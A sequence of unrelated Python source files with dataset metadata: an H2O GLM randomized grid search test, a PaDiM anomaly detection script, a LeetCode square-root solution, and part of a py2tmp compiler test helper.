# setup_data our stopping condition here, random discrete and find all models
search_criteria = {'strategy': 'RandomDiscrete', "stopping_rounds": 0, "seed": round(time.time())}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
# fire off random grid-search
random_grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
random_grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
# compare number of models built from both gridsearch
if not (len(random_grid_model) == self.possible_number_models):
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test1_glm_random_grid_search_model_number for GLM: failed, number of models generated"
"possible model number {0} and randomized gridsearch model number {1} are not "
"equal.".format(self.possible_number_models, len(random_grid_model)))
else:
self.max_grid_runtime = pyunit_utils.find_grid_runtime(random_grid_model) # time taken to build all models
if self.test_failed_array[self.test_num] == 0:
print("test1_glm_random_grid_search_model_number for GLM: passed!")
self.test_num += 1
sys.stdout.flush()
def test2_glm_random_grid_search_max_model(self):
"""
This test is used to test the stopping condition max_model_number in the randomized gridsearch. The
max_models parameter is randomly generated. If it is higher than the actual possible number of models
that can be generated with the current hyper-space parameters, randomized grid search should generate
all the models. Otherwise, grid search shall return a model that equals to the max_model setting.
"""
print("*******************************************************************************************")
print("test2_glm_random_grid_search_max_model for GLM " + self.family)
h2o.cluster_info()
# setup_data our stopping condition here
self.max_model_number = random.randint(1, int(self.allowed_scaled_model_number * self.possible_number_models))
search_criteria = {'strategy': 'RandomDiscrete', 'max_models': self.max_model_number,
"seed": round(time.time())}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
print("Possible number of models built is {0}".format(self.possible_number_models))
# fire off random grid-search
grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
number_model_built = len(grid_model) # count actual number of models built
print("Maximum model limit is {0}. Number of models built is {1}".format(search_criteria["max_models"],
number_model_built))
if self.possible_number_models >= self.max_model_number: # stopping condition restricts model number
if not (number_model_built == self.max_model_number):
print("test2_glm_random_grid_search_max_model: failed. Number of model built {0} "
"does not match stopping condition number{1}.".format(number_model_built, self.max_model_number))
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
else:
print("test2_glm_random_grid_search_max_model for GLM: passed.")
else: # stopping condition is too loose
if not (number_model_built == self.possible_number_models):
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test2_glm_random_grid_search_max_model: failed. Number of model built {0} does not equal "
"to possible model number {1}.".format(number_model_built, self.possible_number_models))
else:
print("test2_glm_random_grid_search_max_model for GLM: passed.")
self.test_num += 1
sys.stdout.flush()
def test3_glm_random_grid_search_max_runtime_secs(self):
"""
This function will test the stopping criteria max_runtime_secs. For each model built, the field
run_time actually denote the time in ms used to build the model. We will add up the run_time from all
models and check against the stopping criteria max_runtime_secs. Since each model will check its run time
differently, there is some inaccuracies in the actual run time. For example, if we give a model 10 ms to
build. The GLM may check and see if it has used up all the time for every 10 epochs that it has run. On
the other hand, deeplearning may check the time it has spent after every epoch of training.
If we are able to restrict the runtime to not exceed the specified max_runtime_secs by a certain
percentage, we will consider the test a success.
:return: None
"""
print("*******************************************************************************************")
print("test3_glm_random_grid_search_max_runtime_secs for GLM " + self.family)
h2o.cluster_info()
if "max_runtime_secs" in list(self.hyper_params):
del self.hyper_params['max_runtime_secs']
# number of possible models being built:
self.possible_number_models = pyunit_utils.count_models(self.hyper_params)
# setup_data our stopping condition here
max_run_time_secs = random.uniform(self.one_model_time, self.allowed_scaled_time*self.max_grid_runtime)
search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': max_run_time_secs,
"seed": round(time.time())}
# search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': 1/1e8}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
# fire off random grid-search
grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
actual_run_time_secs = pyunit_utils.find_grid_runtime(grid_model)
print("Maximum time limit is {0}. Time taken to build all model is "
"{1}".format(search_criteria["max_runtime_secs"], actual_run_time_secs))
print("Maximum model number is {0}. Actual number of models built is {1}".format(self.possible_number_models,
len(grid_model)))
if actual_run_time_secs <= search_criteria["max_runtime_secs"]*(1+self.allowed_diff):
print("test3_glm_random_grid_search_max_runtime_secs: passed!")
if len(grid_model) > self.possible_number_models: # generate too many models, something is wrong
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test3_glm_random_grid_search_max_runtime_secs: failed. Generated {0} models "
" which exceeds maximum possible model number {1}".format(len(grid_model),
self.possible_number_models))
elif len(grid_model) == 1: # will always generate 1 model
print("test3_glm_random_grid_search_max_runtime_secs: passed!")
else:
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test3_glm_random_grid_search_max_runtime_secs: failed. Model takes time {0}"
" seconds which exceeds allowed time {1}".format(actual_run_time_secs,
max_run_time_secs*(1+self.allowed_diff)))
self.test_num += 1
sys.stdout.flush()
def test4_glm_random_grid_search_metric(self, metric_name, bigger_is_better):
"""
This function will test the last stopping condition using metrics.
:param metric_name: metric we want to use to test the last stopping condition
:param bigger_is_better: higher metric value indicates better model performance
:return: None
"""
print("*******************************************************************************************")
print("test4_glm_random_grid_search_metric using " + metric_name + " for family " + self.family)
h2o.cluster_info()
search_criteria = {
"strategy": "RandomDiscrete",
"stopping_metric": metric_name,
"stopping_tolerance": random.uniform(1e-8, self.max_tolerance),
"stopping_rounds": random.randint(1, self.max_stopping_rounds),
"seed": round(time.time())
}
print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
# add max_runtime_secs back into hyper-parameters to limit model runtime.
self.hyper_params["max_runtime_secs"] = [0.3] # arbitrarily set to 0.1 second
# fire off random grid-search
grid_model = \
H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
hyper_params=self.hyper_params, search_criteria=search_criteria)
grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
# bool indicating if randomized grid search has calculated the early stopping condition correctly
stopped_correctly = \
pyunit_utils.evaluate_metrics_stopping(grid_model.models, metric_name, bigger_is_better, search_criteria,
self.possible_number_models)
if stopped_correctly:
print("test4_glm_random_grid_search_metric " + metric_name + ": passed. ")
else:
self.test_failed += 1
self.test_failed_array[self.test_num] = 1
print("test4_glm_random_grid_search_metric " + metric_name + ": failed. ")
self.test_num += 1
def test_random_grid_search_for_glm():
"""
Create and instantiate classes, call test methods to test randomize grid search for GLM Gaussian
or Binomial families.
:return: None
"""
# randomize grid search for Gaussian
test_glm_gaussian_random_grid = Test_glm_random_grid_search("gaussian")
test_glm_gaussian_random_grid.test1_glm_random_grid_search_model_number("mse(xval=True)") # this test must be run.
test_glm_gaussian_random_grid.test2_glm_random_grid_search_max_model()
test_glm_gaussian_random_grid.test3_glm_random_grid_search_max_runtime_secs()
test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("MSE", False)
# test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("r2", True) # R2 was removed as a stopping metric
# test_glm_gaussian_random_grid.tear_down() # obsolete
# exit with error if any tests have failed
if test_glm_gaussian_random_grid.test_failed > 0:
sys.exit(1)
else:
pyunit_utils.remove_files(os.path.join(test_glm_gaussian_random_grid.current_dir,
test_glm_gaussian_random_grid.json_filename))
if __name__ == "__main__":
pyunit_utils.standalone_test(test_random_grid_search_for_glm)
else:
test_random_grid_search_for_glm()
| h2o-py/dynamic_tests/testdir_algos/glm/pyunit_glm_gaussian_gridsearch_randomdiscrete_large.py | 23,996 | This class is created to test the three stopping conditions for randomized gridsearch using
GLM Binomial family. The three stopping conditions are :
1. max_runtime_secs:
2. max_models:
3. metrics. We will be picking 2 stopping metrics to test this stopping condition with. One metric
will be optimized if it increases and the other one should be optimized if it decreases.
I have written 4 tests:
1. test1_glm_random_grid_search_model_number: this test will not put any stopping conditions
on randomized search. The purpose here is to make sure that randomized search will give us all possible
hyper-parameter combinations.
2. test2_glm_random_grid_search_max_model: this test the stopping condition of setting the max_model in
search criteria;
3. test3_glm_random_grid_search_max_runtime_secs: this test the stopping condition max_runtime_secs
in search criteria;
4. test4_glm_random_grid_search_metric: this test the stopping condition of using a metric which can be
increasing or decreasing.
Constructor.
:param family: distribution family for tests
:return: None
This function performs all initializations necessary:
load the data sets and set the training set indices and response column index
This function setup the randomized gridsearch parameters that will be used later on:
1. It will first try to grab all the parameters that are griddable and parameters used by GLM.
2. It will find the intersection of parameters that are both griddable and used by GLM.
3. There are several extra parameters that are used by GLM that are denoted as griddable but actually is not.
These parameters have to be discovered manually and they These are captured in self.exclude_parameter_lists.
4. We generate the gridsearch hyper-parameter. For numerical parameters, we will generate those randomly.
For enums, we will include all of them.
:return: None
This function performs teardown after the dynamic test is completed. If all tests
passed, it will delete all data sets generated since they can be quite large. It
will move the training/validation/test data sets into a Rsandbox directory so that
we can re-run the failed test.
This test is used to make sure the randomized gridsearch will generate all models specified in the
hyperparameters if no stopping condition is given in the search criterion.
:param metric_name: string to denote what grid search model should be sort by
:return: None
This test is used to test the stopping condition max_model_number in the randomized gridsearch. The
max_models parameter is randomly generated. If it is higher than the actual possible number of models
that can be generated with the current hyper-space parameters, randomized grid search should generate
all the models. Otherwise, grid search shall return a model that equals to the max_model setting.
This function will test the stopping criteria max_runtime_secs. For each model built, the field
run_time actually denote the time in ms used to build the model. We will add up the run_time from all
models and check against the stopping criteria max_runtime_secs. Since each model will check its run time
differently, there is some inaccuracies in the actual run time. For example, if we give a model 10 ms to
build. The GLM may check and see if it has used up all the time for every 10 epochs that it has run. On
the other hand, deeplearning may check the time it has spent after every epoch of training.
If we are able to restrict the runtime to not exceed the specified max_runtime_secs by a certain
percentage, we will consider the test a success.
:return: None
This function will test the last stopping condition using metrics.
:param metric_name: metric we want to use to test the last stopping condition
:param bigger_is_better: higher metric value indicates better model performance
:return: None
Create and instantiate classes, call test methods to test randomize grid search for GLM Gaussian
or Binomial families.
:return: None
parameters set by users, change with care parameters denoting filenames of interested that store training/validation/test data sets in csv format error tolerance allowed fraction of max_runtime_secs allowed for max run time stopping criteria System parameters, do not change. Dire consequences may follow if you do directory of this test file training data row count, randomly generated later training data column count, randomly generated later maximum size of random integer values minimum size of random integer values maximum number of integer random grid values to generate maximum size of random float values minimum size of random float values maximum number of real grid values to generate scale lambda value to be from 0 to 100 instead of 0 to 1 scale the max runtime to be different from 0 to 1 time taken to build one barebone model possible number of models built based on hyper-parameter specification maximum number of models specified to test for stopping conditions, generated later maximum runtime value in seconds, 1 minute max used to set max_allowed_runtime as allowed_scaled_overtime * total model run time how much to scale back max time used to set max_model_number as possible_number_models * allowed_scaled_model_number maximum stopping rounds allowed to be used for early stopping metric maximum tolerance to be used for early stopping metric set gaussian as default name of this test sandbox directory where we are going to save our failed test data sets store information about training/test data sets store predictor indices in the data set store response index in the data set store training data sets number of tests carried out count total number of tests that have failed denote test results for all tests run. 1 error, 0 pass index representing which test is being run give the user opportunity to pre-assign hyper parameters for fixed values parameters to be excluded from hyper parameter list even though they may be gridable do not need these these are supposed to be gridable but not really these are excluded for extracting parameters to manually build H2O GLM models store griddable parameter names store the corresponding griddable parameter types store the gridabble parameter default values count number of models built with correct hyper-parameter specification enable cross validation to test fold_assignment setup_data training data setup_data grid hyper-parameters clean out the sandbox directory first preload data sets set data set indices for predictors and response save the training data files just in case the code crashed. build bare bone model to get all parameters find model train time grab all gridable parameters and its type give the user opportunity to pre-assign hyper parameters for fixed values randomly generate griddable parameters change the value of lambda parameters to be from 0 to self.lambda_scale instead of 0 to 1. change the value of runtime parameters to be from 0 to self.lambda_scale instead of 0 to 1. number of possible models being built: save hyper-parameters in sandbox and current test directories. some tests have failed. Need to save data sets for later re-runs create Rsandbox directory to keep data sets and weight information Do not want to save all data sets. Only save data sets that are needed for failed tests write out the jenkins job info into log files. all tests have passed. Delete sandbox if if was not wiped before setup_data our stopping condition here, random discrete and find all models fire off random grid-search compare number of models built from both gridsearch time taken to build all models setup_data our stopping condition here fire off random grid-search count actual number of models built stopping condition restricts model number stopping condition is too loose number of possible models being built: setup_data our stopping condition here search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': 1/1e8} fire off random grid-search generate too many models, something is wrong will always generate 1 model add max_runtime_secs back into hyper-parameters to limit model runtime. arbitrarily set to 0.1 second fire off random grid-search bool indicating if randomized grid search has calculated the early stopping condition correctly randomize grid search for Gaussian this test must be run. test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("r2", True) R2 was removed as a stopping metric test_glm_gaussian_random_grid.tear_down() obsolete exit with error if any tests have failed | 8,494 | en | 0.817193 |
import random
from random import sample
import argparse
import numpy as np
import os
import pickle
from tqdm import tqdm
from collections import OrderedDict
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import precision_recall_curve
from sklearn.covariance import LedoitWolf
from scipy.spatial.distance import mahalanobis
from scipy.ndimage import gaussian_filter
from skimage import morphology
from skimage.segmentation import mark_boundaries
import matplotlib.pyplot as plt
import matplotlib
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision.models import wide_resnet50_2, resnet18
import datasets.mvtec as mvtec
# device setup
use_cuda = torch.cuda.is_available()
device = torch.device('cuda' if use_cuda else 'cpu')
def parse_args():
parser = argparse.ArgumentParser('PaDiM')
parser.add_argument('--data_path', type=str, default='D:/dataset/mvtec_anomaly_detection')
parser.add_argument('--save_path', type=str, default='./mvtec_result')
parser.add_argument('--arch', type=str, choices=['resnet18', 'wide_resnet50_2'], default='wide_resnet50_2')
return parser.parse_args()
def main():
args = parse_args()
# load model
if args.arch == 'resnet18':
model = resnet18(pretrained=True, progress=True)
t_d = 448
d = 100
elif args.arch == 'wide_resnet50_2':
model = wide_resnet50_2(pretrained=True, progress=True)
t_d = 1792
d = 550
model.to(device)
model.eval()
random.seed(1024)
torch.manual_seed(1024)
if use_cuda:
torch.cuda.manual_seed_all(1024)
idx = torch.tensor(sample(range(0, t_d), d))
# set model's intermediate outputs
outputs = []
def hook(module, input, output):
outputs.append(output)
model.layer1[-1].register_forward_hook(hook)
model.layer2[-1].register_forward_hook(hook)
model.layer3[-1].register_forward_hook(hook)
os.makedirs(os.path.join(args.save_path, 'temp_%s' % args.arch), exist_ok=True)
# fig, ax = plt.subplots(1, 2, figsize=(20, 10))
# fig_img_rocauc = ax[0]
# fig_pixel_rocauc = ax[1]
total_roc_auc = []
total_pixel_roc_auc = []
for class_name in mvtec.CLASS_NAMES:
train_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=True)
train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True)
test_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=False)
test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True)
train_outputs = OrderedDict([('layer1', []), ('layer2', []), ('layer3', [])])
test_outputs = OrderedDict([('layer1', []), ('layer2', []), ('layer3', [])])
# extract train set features
train_feature_filepath = os.path.join(args.save_path, 'temp_%s' % args.arch, 'train_%s.pkl' % class_name)
if not os.path.exists(train_feature_filepath):
for (x, _, _) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name):
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(train_outputs.keys(), outputs):
train_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in train_outputs.items():
train_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = train_outputs['layer1']
for layer_name in ['layer2', 'layer3']:
embedding_vectors = embedding_concat(embedding_vectors, train_outputs[layer_name])
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate multivariate Gaussian distribution
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W)
mean = torch.mean(embedding_vectors, dim=0).numpy()
cov = torch.zeros(C, C, H * W).numpy()
I = np.identity(C)
for i in range(H * W):
# cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_
cov[:, :, i] = np.cov(embedding_vectors[:, :, i].numpy(), rowvar=False) + 0.01 * I
# save learned distribution
train_outputs = [mean, cov]
with open(train_feature_filepath, 'wb') as f:
pickle.dump(train_outputs, f)
else:
print('load train set feature from: %s' % train_feature_filepath)
with open(train_feature_filepath, 'rb') as f:
train_outputs = pickle.load(f)
gt_list = []
gt_mask_list = []
test_imgs = []
# extract test set features
for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name):
test_imgs.extend(x.cpu().detach().numpy())
gt_list.extend(y.cpu().detach().numpy())
gt_mask_list.extend(mask.cpu().detach().numpy())
# model prediction
with torch.no_grad():
_ = model(x.to(device))
# get intermediate layer outputs
for k, v in zip(test_outputs.keys(), outputs):
test_outputs[k].append(v.cpu().detach())
# initialize hook outputs
outputs = []
for k, v in test_outputs.items():
test_outputs[k] = torch.cat(v, 0)
# Embedding concat
embedding_vectors = test_outputs['layer1']
for layer_name in ['layer2', 'layer3']:
embedding_vectors = embedding_concat(embedding_vectors, test_outputs[layer_name])
# randomly select d dimension
embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
# calculate distance matrix
B, C, H, W = embedding_vectors.size()
embedding_vectors = embedding_vectors.view(B, C, H * W).numpy()
dist_list = []
for i in range(H * W):
mean = train_outputs[0][:, i]
conv_inv = np.linalg.inv(train_outputs[1][:, :, i])
dist = [mahalanobis(sample[:, i], mean, conv_inv) for sample in embedding_vectors]
dist_list.append(dist)
dist_list = np.array(dist_list).transpose(1, 0).reshape(B, H, W)
# upsample
dist_list = torch.tensor(dist_list)
score_map = F.interpolate(dist_list.unsqueeze(1), size=x.size(2), mode='bilinear',
align_corners=False).squeeze().numpy()
# apply gaussian smoothing on the score map
for i in range(score_map.shape[0]):
score_map[i] = gaussian_filter(score_map[i], sigma=4)
# Normalization
max_score = score_map.max()
min_score = score_map.min()
scores = (score_map - min_score) / (max_score - min_score)
# calculate image-level ROC AUC score
img_scores = scores.reshape(scores.shape[0], -1).max(axis=1)
gt_list = np.asarray(gt_list)
fpr, tpr, _ = roc_curve(gt_list, img_scores)
img_roc_auc = roc_auc_score(gt_list, img_scores)
total_roc_auc.append(img_roc_auc)
print('image ROCAUC: %.3f' % (img_roc_auc))
fig_img_rocauc.plot(fpr, tpr, label='%s img_ROCAUC: %.3f' % (class_name, img_roc_auc))
# get optimal threshold
gt_mask = np.asarray(gt_mask_list)
precision, recall, thresholds = precision_recall_curve(gt_mask.flatten(), scores.flatten())
a = 2 * precision * recall
b = precision + recall
f1 = np.divide(a, b, out=np.zeros_like(a), where=b != 0)
threshold = thresholds[np.argmax(f1)]
# calculate per-pixel level ROCAUC
fpr, tpr, _ = roc_curve(gt_mask.flatten(), scores.flatten())
per_pixel_rocauc = roc_auc_score(gt_mask.flatten(), scores.flatten())
total_pixel_roc_auc.append(per_pixel_rocauc)
print('pixel ROCAUC: %.3f' % (per_pixel_rocauc))
# fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc))
# save_dir = args.save_path + '/' + f'pictures_{args.arch}'
# os.makedirs(save_dir, exist_ok=True)
# plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name)
print('Average ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.title.set_text('Average image ROCAUC: %.3f' % np.mean(total_roc_auc))
fig_img_rocauc.legend(loc="lower right")
print('Average pixel ROCUAC: %.3f' % np.mean(total_pixel_roc_auc))
fig_pixel_rocauc.title.set_text('Average pixel ROCAUC: %.3f' % np.mean(total_pixel_roc_auc))
fig_pixel_rocauc.legend(loc="lower right")
fig.tight_layout()
fig.savefig(os.path.join(args.save_path, 'roc_curve.png'), dpi=100)
def plot_fig(test_img, scores, gts, threshold, save_dir, class_name):
num = len(scores)
vmax = scores.max() * 255.
vmin = scores.min() * 255.
for i in range(num):
img = test_img[i]
img = denormalization(img)
gt = gts[i].transpose(1, 2, 0).squeeze()
heat_map = scores[i] * 255
mask = scores[i]
mask[mask > threshold] = 1
mask[mask <= threshold] = 0
kernel = morphology.disk(4)
mask = morphology.opening(mask, kernel)
mask *= 255
vis_img = mark_boundaries(img, mask, color=(1, 0, 0), mode='thick')
fig_img, ax_img = plt.subplots(1, 5, figsize=(12, 3))
fig_img.subplots_adjust(right=0.9)
norm = matplotlib.colors.Normalize(vmin=vmin, vmax=vmax)
for ax_i in ax_img:
ax_i.axes.xaxis.set_visible(False)
ax_i.axes.yaxis.set_visible(False)
ax_img[0].imshow(img)
ax_img[0].title.set_text('Image')
ax_img[1].imshow(gt, cmap='gray')
ax_img[1].title.set_text('GroundTruth')
ax = ax_img[2].imshow(heat_map, cmap='jet', norm=norm)
ax_img[2].imshow(img, cmap='gray', interpolation='none')
ax_img[2].imshow(heat_map, cmap='jet', alpha=0.5, interpolation='none')
ax_img[2].title.set_text('Predicted heat map')
ax_img[3].imshow(mask, cmap='gray')
ax_img[3].title.set_text('Predicted mask')
ax_img[4].imshow(vis_img)
ax_img[4].title.set_text('Segmentation result')
left = 0.92
bottom = 0.15
width = 0.015
height = 1 - 2 * bottom
rect = [left, bottom, width, height]
cbar_ax = fig_img.add_axes(rect)
cb = plt.colorbar(ax, shrink=0.6, cax=cbar_ax, fraction=0.046)
cb.ax.tick_params(labelsize=8)
font = {
'family': 'serif',
'color': 'black',
'weight': 'normal',
'size': 8,
}
cb.set_label('Anomaly Score', fontdict=font)
fig_img.savefig(os.path.join(save_dir, class_name + '_{}'.format(i)), dpi=100)
plt.close()
def denormalization(x):
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
x = (((x.transpose(1, 2, 0) * std) + mean) * 255.).astype(np.uint8)
return x
def embedding_concat(x, y):
B, C1, H1, W1 = x.size()
_, C2, H2, W2 = y.size()
s = int(H1 / H2)
x = F.unfold(x, kernel_size=s, dilation=1, stride=s)
x = x.view(B, C1, -1, H2, W2)
z = torch.zeros(B, C1 + C2, x.size(2), H2, W2)
for i in range(x.size(2)):
z[:, :, i, :, :] = torch.cat((x[:, :, i, :, :], y), 1)
z = z.view(B, -1, H2 * W2)
z = F.fold(z, kernel_size=s, output_size=(H1, W1), stride=s)
return z
if __name__ == '__main__':
main()
| main.py | 11,806 | device setup load model set model's intermediate outputs fig, ax = plt.subplots(1, 2, figsize=(20, 10)) fig_img_rocauc = ax[0] fig_pixel_rocauc = ax[1] extract train set features model prediction get intermediate layer outputs initialize hook outputs Embedding concat randomly select d dimension calculate multivariate Gaussian distribution cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_ save learned distribution extract test set features model prediction get intermediate layer outputs initialize hook outputs Embedding concat randomly select d dimension calculate distance matrix upsample apply gaussian smoothing on the score map Normalization calculate image-level ROC AUC score get optimal threshold calculate per-pixel level ROCAUC fig_pixel_rocauc.plot(fpr, tpr, label='%s ROCAUC: %.3f' % (class_name, per_pixel_rocauc)) save_dir = args.save_path + '/' + f'pictures_{args.arch}' os.makedirs(save_dir, exist_ok=True) plot_fig(test_imgs, scores, gt_mask_list, threshold, save_dir, class_name) | 1,031 | en | 0.414045 |
# PROBLEM LINK:- https://leetcode.com/problems/sqrtx/
class Solution:
def mySqrt(self, x):
a = 1e-6
low = 1
high = x
while high - low > a:
mid = (high + low)/2
if mid * mid < x:
low = mid
else:
high = mid
return int(high)
| SEARCHING/EASY/Sqrt(x)/Code.py | 335 | PROBLEM LINK:- https://leetcode.com/problems/sqrtx/ | 51 | en | 0.728912 |
#!/usr/bin/env python3
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import json
import os
import tempfile
import unittest
import textwrap
import re
import sys
import itertools
import subprocess
from functools import wraps
import difflib
import pytest
import py2tmp_test_config as config
import typed_ast.ast3 as ast
from _py2tmp import (
ast_to_ir3,
ir3_to_ir2,
ir2_to_ir1,
ir1_to_ir0,
optimize_ir3,
optimize_ir0,
ir0_to_cpp,
ir0,
utils,
)
def pretty_print_command(command):
return ' '.join('"' + x + '"' for x in command)
def add_line_numbers(source_code):
lines = source_code.splitlines()
last_line_num_length = len(str(len(lines)))
return '\n'.join('%%%sd: %%s' % last_line_num_length % (n + 1, line) for n, line in enumerate(lines))
class CommandFailedException(Exception):
def __init__(self, command, stdout, stderr, error_code):
self.command = command
self.stdout = stdout
self.stderr = stderr
self.error_code = error_code
def __str__(self):
return textwrap.dedent('''\
Ran command: {command}
Exit code {error_code}
Stdout:
{stdout}
Stderr:
{stderr}
''').format(command=pretty_print_command(self.command), error_code=self.error_code, stdout=self.stdout, stderr=self.stderr)
def run_command(executable, args=[]):
command = [executable] + args
print('Executing command:', pretty_print_command(command))
try:
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
(stdout, stderr) = p.communicate()
except Exception as e:
raise Exception("While executing: %s" % command)
if p.returncode != 0:
raise CommandFailedException(command, stdout, stderr, p.returncode)
print('Execution successful.')
print('stdout:')
print(stdout)
print('')
print('stderr:')
print(stderr)
print('')
return (stdout, stderr)
def run_compiled_executable(executable):
run_command(executable)
class CompilationFailedException(Exception):
def __init__(self, command, error_message):
self.command = command
self.error_message = error_message
def __str__(self):
return textwrap.dedent('''\
Ran command: {command}
Error message:
{error_message}
''').format(command=pretty_print_command(self.command), error_message=self.error_message)
class PosixCompiler:
def __init__(self):
self.executable = config.CXX
self.name = config.CXX_COMPILER_NAME
def compile_discarding_output(self, source, include_dirs, args=[]):
try:
args = args + ['-c', source, '-o', os.path.devnull]
self._compile(include_dirs, args=args)
except CommandFailedException as e:
raise CompilationFailedException(e.command, e.stderr)
def compile_and_link(self, source, include_dirs, output_file_name, args=[]):
self._compile(
include_dirs,
args = (
[source]
+ args
+ ['-o', output_file_name]
))
def _compile(self, include_dirs, args):
include_flags = ['-I%s' % include_dir for include_dir in include_dirs]
args = (
['-W', '-Wall', '-g0', '-Werror', '-std=c++11']
+ include_flags
+ args
)
run_command(self.executable, args)
class MsvcCompiler:
def __init__(self):
self.executable = config.CXX
self.name = config.CXX_COMPILER_NAME
def compile_discarding_output(self, source, include_dirs, args=[]):
try:
args = args + ['/c', source]
self._compile(include_dirs, args = args)
except CommandFailedException as e:
# Note that we use stdout here, unlike above. MSVC reports compilation warnings and errors on stdout.
raise CompilationFailedException(e.command, e.stdout)
def compile_and_link(self, source, include_dirs, output_file_name, args=[]):
self._compile(
include_dirs,
args = (
[source]
+ args
+ ['/Fe' + output_file_name]
))
def _compile(self, include_dirs, args):
include_flags = ['-I%s' % include_dir for include_dir in include_dirs]
args = (
['/nologo', '/FS', '/W4', '/D_SCL_SECURE_NO_WARNINGS', '/WX']
+ include_flags
+ args
)
run_command(self.executable, args)
if config.CXX_COMPILER_NAME == 'MSVC':
compiler = MsvcCompiler()
py2tmp_error_message_extraction_regex = 'error C2338: (.*)'
else:
compiler = PosixCompiler()
py2tmp_error_message_extraction_regex = 'static.assert(.*)'
_assert_helper = unittest.TestCase()
def _create_temporary_file(file_content, file_name_suffix=''):
file_descriptor, file_name = tempfile.mkstemp(text=True, suffix=file_name_suffix)
file = os.fdopen(file_descriptor, mode='w')
file.write(file_content)
file.close()
return file_name
def _cap_to_lines(s, n):
lines = s.splitlines()
if len(lines) <= n:
return s
else:
return '\n'.join(lines[0:n] + ['...'])
def try_remove_temporary_file(filename):
try:
os.remove(filename)
except:
# When running tests on Windows using Appveyor, the remove command fails for temporary files sometimes.
# This shouldn't cause the tests to fail, so we ignore the exception and go ahead.
pass
def expect_cpp_code_compile_error_helper(check_error_fun, tmppy_source, module_ir2, module_ir1, cxx_source):
source_file_name = _create_temporary_file(cxx_source, file_name_suffix='.cpp')
try:
compiler.compile_discarding_output(
source=source_file_name,
include_dirs=[config.MPYL_INCLUDE_DIR],
args=[])
pytest.fail(textwrap.dedent('''\
The test should have failed to compile, but it compiled successfully.
TMPPy source:
{tmppy_source}
TMPPy IR2:
{tmppy_ir2}
TMPPy IR1:
{tmppy_ir1}
C++ source code:
{cxx_source}
''').format(tmppy_source = add_line_numbers(tmppy_source),
tmppy_ir2=str(module_ir2),
tmppy_ir1=str(module_ir1),
cxx_source = add_line_numbers(cxx_source)),
pytrace=False)
except CompilationFailedException as e1:
e = e1
error_message = e.error_message
error_message_lines = error_message.splitlines()
# Different compilers output a different number of spaces when pretty-printing types.
# When using libc++, sometimes std::foo identifiers are reported as std::__1::foo.
normalized_error_message = error_message.replace(' ', '').replace('std::__1::', 'std::')
normalized_error_message_lines = normalized_error_message.splitlines()
error_message_head = _cap_to_lines(error_message, 40)
check_error_fun(e, error_message_lines, error_message_head, normalized_error_message_lines)
try_remove_temporary_file(source_file_name)
def expect_cpp_code_generic_compile_error(expected_error_regex, tmppy_source, module_ir2, module_ir1, cxx_source):
"""
Tests that the given source produces the expected error during compilation.
:param expected_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param cxx_source: The second part of the source code. This will be dedented.
"""
